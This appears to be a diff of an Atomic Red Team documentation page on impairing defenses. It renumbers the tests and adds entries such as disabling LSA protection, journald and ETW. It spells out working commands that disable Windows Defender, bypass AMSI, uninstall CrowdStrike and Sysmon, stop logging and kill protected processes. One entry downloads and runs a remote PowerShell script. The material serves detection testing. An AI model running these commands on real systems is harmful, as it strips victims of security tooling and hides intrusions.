Windows Defender Command Prompt](#atomic-test-17-tamper-with-windows-defender-command-prompt) -- [Atomic Test #18: Tamper with Windows Defender Registry](#atomic-test-18-tamper-with-windows-defender-registry) -- [Atomic Test #19: Disable Microsoft Office Security Features](#atomic-test-19-disable-microsoft-office-security-features) -- [Atomic Test #20: Remove Windows Defender Definition Files](#atomic-test-20-remove-windows-defender-definition-files) -- [Atomic Test #21: Stop and Remove Arbitrary Security Windows Service](#atomic-test-21-stop-and-remove-arbitrary-security-windows-service) -- [Atomic Test #22: Uninstall Crowdstrike Falcon on Windows](#atomic-test-22-uninstall-crowdstrike-falcon-on-windows) -- [Atomic Test #23: Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-23-tamper-with-windows-defender-evade-scanning--folder) -- [Atomic Test #24: Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-24-tamper-with-windows-defender-evade-scanning--extension) -- [Atomic Test #25: Tamper with Windows Defender Evade Scanning -Process](#atomic-test-25-tamper-with-windows-defender-evade-scanning--process) -- [Atomic Test #26: office-365-Disable-AntiPhishRule](#atomic-test-26-office-365-disable-antiphishrule) -- [Atomic Test #27: Disable Windows Defender with DISM](#atomic-test-27-disable-windows-defender-with-dism) -- [Atomic Test #28: Disable Defender Using NirSoft AdvancedRun](#atomic-test-28-disable-defender-using-nirsoft-advancedrun) -- [Atomic Test #29: Kill antimalware protected processes using Backstab](#atomic-test-29-kill-antimalware-protected-processes-using-backstab) -- [Atomic Test #30: WinPwn - Kill the event log services for stealth](#atomic-test-30-winpwn---kill-the-event-log-services-for-stealth) -- [Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31-tamper-with-windows-defender-atp-using-aliases---powershell) -- [Atomic Test #32: LockBit Black - Disable Privacy Settings 
Experience Using Registry -cmd](#atomic-test-32-lockbit-black---disable-privacy-settings-experience-using-registry--cmd) -- [Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd](#atomic-test-33-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd) -- [Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34-lockbit-black---disable-privacy-settings-experience-using-registry--powershell) -- [Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell) -- [Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36-disable-windows-defender-with-pwsh-disable-windowsoptionalfeature) -- [Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37-wmic-tamper-with-windows-defender-evade-scanning-folder) -- [Atomic Test #38: Delete Windows Defender Scheduled Tasks](#atomic-test-38-delete-windows-defender-scheduled-tasks) -- [Atomic Test #39: Clear History](#atomic-test-39-clear-history) -- [Atomic Test #40: Suspend History](#atomic-test-40-suspend-history) -- [Atomic Test #41: Reboot Linux Host via Kernel System Request](#atomic-test-41-reboot-linux-host-via-kernel-system-request) -- [Atomic Test #42: Clear Pagging Cache](#atomic-test-42-clear-pagging-cache) -- [Atomic Test #43: Disable Memory Swap](#atomic-test-43-disable-memory-swap) -- [Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44-disable-hypervisor-enforced-code-integrity-hvci) -- [Atomic Test #45: AMSI Bypass - Override AMSI via COM](#atomic-test-45-amsi-bypass---override-amsi-via-com) -- [Atomic Test #46: AWS - GuardDuty Suspension or Deletion](#atomic-test-46-aws---guardduty-suspension-or-deletion) -- [Atomic Test #47: Tamper with Defender ATP on 
Linux/MacOS](#atomic-test-47-tamper-with-defender-atp-on-linuxmacos) -- [Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48-tamper-with-windows-defender-registry---regexe) -- [Atomic Test #49: Tamper with Windows Defender Registry - Powershell](#atomic-test-49-tamper-with-windows-defender-registry---powershell) -- [Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50-esxi---disable-account-lockout-policy-via-powercli) -- [Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51-delete-microsoft-defender-asr-rules---intune) -- [Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52-delete-microsoft-defender-asr-rules---gpo) -- [Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53-amsi-bypass---create-amsienable-reg-key) -- [Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54-disable-eventlog-application-auto-logger-session-via-registry---cmd) -- [Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55-disable-eventlog-application-auto-logger-session-via-registry---powershell) -- [Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56-disable-eventlog-application-etw-provider-via-registry---cmd) -- [Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57-disable-eventlog-application-etw-provider-via-registry---powershell) -- [Atomic Test #58: Freeze PPL-protected process with EDR-Freeze](#atomic-test-58-freeze-ppl-protected-process-with-edr-freeze) -- [Atomic Test #59: Disable ASLR Via sysctl parameters - Linux](#atomic-test-59-disable-aslr-via-sysctl-parameters---linux) +- [Atomic Test #1: Windows Disable LSA Protection](#atomic-test-1-windows-disable-lsa-protection) +- [Atomic Test #2: Disable journal logging via systemctl 
utility](#atomic-test-2-disable-journal-logging-via-systemctl-utility) +- [Atomic Test #3: Disable journal logging via sed utility](#atomic-test-3-disable-journal-logging-via-sed-utility) +- [Atomic Test #4: Disable syslog](#atomic-test-1-disable-syslog) +- [Atomic Test #5: Disable syslog (freebsd)](#atomic-test-2-disable-syslog-freebsd) +- [Atomic Test #6: Disable Cb Response](#atomic-test-3-disable-cb-response) +- [Atomic Test #7: Disable SELinux](#atomic-test-4-disable-selinux) +- [Atomic Test #8: Stop Crowdstrike Falcon on Linux](#atomic-test-5-stop-crowdstrike-falcon-on-linux) +- [Atomic Test #9: Disable Carbon Black Response](#atomic-test-6-disable-carbon-black-response) +- [Atomic Test #10: Disable LittleSnitch](#atomic-test-7-disable-littlesnitch) +- [Atomic Test #11: Disable OpenDNS Umbrella](#atomic-test-8-disable-opendns-umbrella) +- [Atomic Test #12: Disable macOS Gatekeeper](#atomic-test-9-disable-macos-gatekeeper) +- [Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS](#atomic-test-10-stop-and-unload-crowdstrike-falcon-on-macos) +- [Atomic Test #14: Unload Sysmon Filter Driver](#atomic-test-11-unload-sysmon-filter-driver) +- [Atomic Test #15: Uninstall Sysmon](#atomic-test-12-uninstall-sysmon) +- [Atomic Test #16: AMSI Bypass - AMSI InitFailed](#atomic-test-13-amsi-bypass---amsi-initfailed) +- [Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14-amsi-bypass---remove-amsi-provider-reg-key) +- [Atomic Test #18: Disable Arbitrary Security Windows Service](#atomic-test-15-disable-arbitrary-security-windows-service) +- [Atomic Test #19: Tamper with Windows Defender ATP PowerShell](#atomic-test-16-tamper-with-windows-defender-atp-powershell) +- [Atomic Test #20: Tamper with Windows Defender Command Prompt](#atomic-test-17-tamper-with-windows-defender-command-prompt) +- [Atomic Test #21: Tamper with Windows Defender Registry](#atomic-test-18-tamper-with-windows-defender-registry) +- [Atomic Test #22: Disable Microsoft 
Office Security Features](#atomic-test-19-disable-microsoft-office-security-features) +- [Atomic Test #23: Remove Windows Defender Definition Files](#atomic-test-20-remove-windows-defender-definition-files) +- [Atomic Test #24: Stop and Remove Arbitrary Security Windows Service](#atomic-test-21-stop-and-remove-arbitrary-security-windows-service) +- [Atomic Test #25: Uninstall Crowdstrike Falcon on Windows](#atomic-test-22-uninstall-crowdstrike-falcon-on-windows) +- [Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-23-tamper-with-windows-defender-evade-scanning--folder) +- [Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-24-tamper-with-windows-defender-evade-scanning--extension) +- [Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process](#atomic-test-25-tamper-with-windows-defender-evade-scanning--process) +- [Atomic Test #29: office-365-Disable-AntiPhishRule](#atomic-test-26-office-365-disable-antiphishrule) +- [Atomic Test #30: Disable Windows Defender with DISM](#atomic-test-27-disable-windows-defender-with-dism) +- [Atomic Test #31: Disable Defender Using NirSoft AdvancedRun](#atomic-test-28-disable-defender-using-nirsoft-advancedrun) +- [Atomic Test #32: Kill antimalware protected processes using Backstab](#atomic-test-29-kill-antimalware-protected-processes-using-backstab) +- [Atomic Test #33: WinPwn - Kill the event log services for stealth](#atomic-test-30-winpwn---kill-the-event-log-services-for-stealth) +- [Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31-tamper-with-windows-defender-atp-using-aliases---powershell) +- [Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd](#atomic-test-32-lockbit-black---disable-privacy-settings-experience-using-registry--cmd) +- [Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon 
-cmd](#atomic-test-33-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd) +- [Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34-lockbit-black---disable-privacy-settings-experience-using-registry--powershell) +- [Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell) +- [Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36-disable-windows-defender-with-pwsh-disable-windowsoptionalfeature) +- [Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37-wmic-tamper-with-windows-defender-evade-scanning-folder) +- [Atomic Test #41: Delete Windows Defender Scheduled Tasks](#atomic-test-38-delete-windows-defender-scheduled-tasks) +- [Atomic Test #42: Clear History](#atomic-test-39-clear-history) +- [Atomic Test #43: Suspend History](#atomic-test-40-suspend-history) +- [Atomic Test #44: Reboot Linux Host via Kernel System Request](#atomic-test-41-reboot-linux-host-via-kernel-system-request) +- [Atomic Test #45: Clear Pagging Cache](#atomic-test-42-clear-pagging-cache) +- [Atomic Test #46: Disable Memory Swap](#atomic-test-43-disable-memory-swap) +- [Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44-disable-hypervisor-enforced-code-integrity-hvci) +- [Atomic Test #48: AMSI Bypass - Override AMSI via COM](#atomic-test-45-amsi-bypass---override-amsi-via-com) +- [Atomic Test #49: AWS - GuardDuty Suspension or Deletion](#atomic-test-46-aws---guardduty-suspension-or-deletion) +- [Atomic Test #50: Tamper with Defender ATP on Linux/MacOS](#atomic-test-47-tamper-with-defender-atp-on-linuxmacos) +- [Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48-tamper-with-windows-defender-registry---regexe) +- [Atomic Test #52: Tamper with Windows 
Defender Registry - Powershell](#atomic-test-49-tamper-with-windows-defender-registry---powershell) +- [Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50-esxi---disable-account-lockout-policy-via-powercli) +- [Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51-delete-microsoft-defender-asr-rules---intune) +- [Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52-delete-microsoft-defender-asr-rules---gpo) +- [Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53-amsi-bypass---create-amsienable-reg-key) +- [Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54-disable-eventlog-application-auto-logger-session-via-registry---cmd) +- [Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55-disable-eventlog-application-auto-logger-session-via-registry---powershell) +- [Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56-disable-eventlog-application-etw-provider-via-registry---cmd) +- [Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57-disable-eventlog-application-etw-provider-via-registry---powershell) +- [Atomic Test #61: Freeze PPL-protected process with EDR-Freeze](#atomic-test-58-freeze-ppl-protected-process-with-edr-freeze) +- [Atomic Test #62: Disable ASLR Via sysctl parameters - Linux](#atomic-test-59-disable-aslr-via-sysctl-parameters---linux) +- [Atomic Test #63: Auditing Configuration Changes on Linux Host](#atomic-test-1-auditing-configuration-changes-on-linux-host) +- [Atomic Test #64: Auditing Configuration Changes on FreeBSD Host](#atomic-test-2-auditing-configuration-changes-on-freebsd-host) +- [Atomic Test #65: Logging Configuration Changes on Linux Host](#atomic-test-3-logging-configuration-changes-on-linux-host) +- [Atomic Test #66: Logging Configuration 
Changes on FreeBSD Host](#atomic-test-4-logging-configuration-changes-on-freebsd-host) +- [Atomic Test #67: Disable Powershell ETW Provider - Windows](#atomic-test-5-disable-powershell-etw-provider---windows) +- [Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)](#atomic-test-6-disable-net-event-tracing-for-windows-via-registry-cmd) +- [Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)](#atomic-test-7-disable-net-event-tracing-for-windows-via-registry-powershell) +- [Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd](#atomic-test-8-lockbit-black---disable-the-etw-provider-of-windows-defender--cmd) +- [Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell](#atomic-test-9-lockbit-black---disable-the-etw-provider-of-windows-defender--powershell) +- [Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd](#atomic-test-10-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---cmd) +- [Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell](#atomic-test-11-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---powershell) +- [Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd](#atomic-test-12-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---cmd) +- [Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell](#atomic-test-13-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---powershell) +- [Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table](#atomic-test-14-block-cybersecurity-communication-by-leveraging-windows-name-resolution-policy-table) -### Atomic Test #1: Disable syslog +### Atomic Test #1: 
Windows Disable LSA Protection + +The following Atomic adds a registry entry to disable LSA Protection. + +The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data. +Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection. +https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection +https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/ +https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/ + +**Supported Platforms:** Windows + +**auto_generated_guid:** `40075d5f-3a70-4c66-9125-f72bee87247d` + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + +```cmd +reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands + +```cmd +reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1 +``` +### Atomic Test #2: Disable journal logging via systemctl utility + +The atomic test disables the journal logging using built-in systemctl utility + +**Supported Platforms:** Linux + +**auto_generated_guid:** `c3a377f9-1203-4454-aa35-9d391d34768f` + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. 
root or admin) + +```sh +sudo systemctl stop systemd-journald #disables journal logging +``` + +#### Cleanup Commands + +```sh +sudo systemctl start systemd-journald #starts journal service +sudo systemctl enable systemd-journald #starts journal service automatically at boot time +``` +### Atomic Test #3: Disable journal logging via sed utility + +The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk + +**Supported Platforms:** Linux + +**auto_generated_guid:** `12e5551c-8d5c-408e-b3e4-63f53b03379f` + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + +```sh +sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf +``` + +#### Cleanup Commands + +```sh +sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data +sudo systemctl restart systemd-journald #restart the journal service +``` + +### Atomic Test #4: Disable syslog Disables syslog collection @@ -127,7 +210,7 @@ if #{package_checker} > /dev/null; then exit 0; else exit 1; fi sudo #{package_installer} ``` -### Atomic Test #2: Disable syslog (freebsd) +### Atomic Test #5: Disable syslog (freebsd) Disables syslog collection @@ -148,7 +231,7 @@ sysrc syslogd_enable="NO" sysrc syslogd_enable="YES" service syslogd start ``` -### Atomic Test #3: Disable Cb Response +### Atomic Test #6: Disable Cb Response Disable the Cb Response service @@ -169,7 +252,7 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; fi ``` -### Atomic Test #4: Disable SELinux +### Atomic Test #7: Disable SELinux Disables SELinux enforcement 
@@ -205,7 +288,7 @@ which setenforce echo "SELinux is not installed"; exit 1 ``` -### Atomic Test #5: Stop Crowdstrike Falcon on Linux +### Atomic Test #8: Stop Crowdstrike Falcon on Linux Stop and disable Crowdstrike Falcon on Linux @@ -226,7 +309,7 @@ sudo systemctl disable falcon-sensor.service sudo systemctl enable falcon-sensor.service sudo systemctl start falcon-sensor.service ``` -### Atomic Test #6: Disable Carbon Black Response +### Atomic Test #9: Disable Carbon Black Response Disables Carbon Black Response @@ -247,7 +330,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plis sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist ``` -### Atomic Test #7: Disable LittleSnitch +### Atomic Test #10: Disable LittleSnitch Disables LittleSnitch @@ -266,7 +349,7 @@ sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist ```sh sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist ``` -### Atomic Test #8: Disable OpenDNS Umbrella +### Atomic Test #11: Disable OpenDNS Umbrella Disables OpenDNS Umbrella @@ -285,7 +368,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig ```sh sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist ``` -### Atomic Test #9: Disable macOS Gatekeeper +### Atomic Test #12: Disable macOS Gatekeeper Disables macOS Gatekeeper @@ -304,7 +387,7 @@ sudo spctl --master-disable ```sh sudo spctl --master-enable ``` -### Atomic Test #10: Stop and unload Crowdstrike Falcon on macOS +### Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS 
@@ -332,7 +415,7 @@ sudo launchctl unload #{userdaemon_plist} sudo launchctl load -w #{falcond_plist} sudo launchctl load -w #{userdaemon_plist} ``` -### Atomic Test #11: Unload Sysmon Filter Driver +### Atomic Test #14: Unload Sysmon Filter Driver Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". @@ -415,7 +498,7 @@ if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){ } ``` -### Atomic Test #12: Uninstall Sysmon +### Atomic Test #15: Uninstall Sysmon Uninstall Sysinternals Sysmon for Defense Evasion @@ -427,7 +510,7 @@ Uninstall Sysinternals Sysmon for Defense Evasion | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder\T1562.001\bin\sysmon.exe| +| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder\T1685\bin\sysmon.exe| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) @@ -475,7 +558,7 @@ if(cmd /c sc query sysmon) { exit 0} else { exit 1} cmd /c sysmon -i -accepteula ``` -### Atomic Test #13: AMSI Bypass - AMSI InitFailed +### Atomic Test #16: AMSI Bypass - AMSI InitFailed Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed. 
@@ -497,7 +580,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ ```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false) ``` -### Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key +### Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. @@ -518,7 +601,7 @@ Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-9 ```powershell New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null ``` -### Atomic Test #15: Disable Arbitrary Security Windows Service +### Atomic Test #18: Disable Arbitrary Security Windows Service With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. @@ -547,7 +630,7 @@ sc.exe config #{service_name} start= disabled sc.exe config #{service_name} start= auto >nul 2>&1 net.exe start #{service_name} >nul 2>&1 ``` -### Atomic Test #16: Tamper with Windows Defender ATP PowerShell +### Atomic Test #19: Tamper with Windows Defender ATP PowerShell Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. 
@@ -573,7 +656,7 @@ Set-MpPreference -DisableBehaviorMonitoring 0 Set-MpPreference -DisableScriptScanning 0 Set-MpPreference -DisableBlockAtFirstSeen 0 ``` -### Atomic Test #17: Tamper with Windows Defender Command Prompt +### Atomic Test #20: Tamper with Windows Defender Command Prompt Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" @@ -597,7 +680,7 @@ sc query WinDefend sc start WinDefend >nul 2>&1 sc config WinDefend start=enabled >nul 2>&1 ``` -### Atomic Test #18: Tamper with Windows Defender Registry +### Atomic Test #21: Tamper with Windows Defender Registry Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info. @@ -617,7 +700,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa ```powershell Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 ``` -### Atomic Test #19: Disable Microsoft Office Security Features +### Atomic Test #22: Disable Microsoft Office Security Features Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document. 
@@ -647,7 +730,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore ``` -### Atomic Test #20: Remove Windows Defender Definition Files +### Atomic Test #23: Remove Windows Defender Definition Files Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the @@ -665,7 +748,7 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state- "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` -### Atomic Test #21: Stop and Remove Arbitrary Security Windows Service +### Atomic Test #24: Stop and Remove Arbitrary Security Windows Service Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database. @@ -686,7 +769,7 @@ Stop-Service -Name #{service_name} Remove-Service -Name #{service_name} ``` -### Atomic Test #22: Uninstall Crowdstrike Falcon on Windows +### Atomic Test #25: Uninstall Crowdstrike Falcon on Windows Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller. 
@@ -706,7 +789,7 @@ Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as a if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}} ``` -### Atomic Test #23: Tamper with Windows Defender Evade Scanning -Folder +### Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. @@ -735,7 +818,7 @@ Add-MpPreference -ExclusionPath $excludedpath $excludedpath= "#{excluded_folder}" Remove-MpPreference -ExclusionPath $excludedpath ``` -### Atomic Test #24: Tamper with Windows Defender Evade Scanning -Extension +### Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. @@ -764,7 +847,7 @@ Add-MpPreference -ExclusionExtension $excludedExts $excludedExts= "#{excluded_exts}" Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore ``` -### Atomic Test #25: Tamper with Windows Defender Evade Scanning -Process +### Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. 
@@ -793,7 +876,7 @@ Add-MpPreference -ExclusionProcess $excludedProcess $excludedProcess = "#{excluded_process}" Remove-MpPreference -ExclusionProcess $excludedProcess ``` -### Atomic Test #26: office-365-Disable-AntiPhishRule +### Atomic Test #29: office-365-Disable-AntiPhishRule Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. @@ -851,7 +934,7 @@ Install-Module -Name ExchangeOnlineManagement Import-Module ExchangeOnlineManagement ``` -### Atomic Test #27: Disable Windows Defender with DISM +### Atomic Test #30: Disable Windows Defender with DISM The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. @@ -868,7 +951,7 @@ This method will remove Defender and it's package. Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet ``` -### Atomic Test #28: Disable Defender Using NirSoft AdvancedRun +### Atomic Test #31: Disable Defender Using NirSoft AdvancedRun Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign. 
@@ -920,7 +1003,7 @@ Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathT Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force ``` -### Atomic Test #29: Kill antimalware protected processes using Backstab +### Atomic Test #32: Kill antimalware protected processes using Backstab Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill. https://github.com/Yaxser/Backstab @@ -959,7 +1042,7 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" ``` -### Atomic Test #30: WinPwn - Kill the event log services for stealth +### Atomic Test #33: WinPwn - Kill the event log services for stealth Kill the event log services for stealth via function of WinPwn @@ -974,7 +1057,7 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/ inv-phantom -consoleoutput -noninteractive ``` -### Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell +### Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled in Windows settings. 
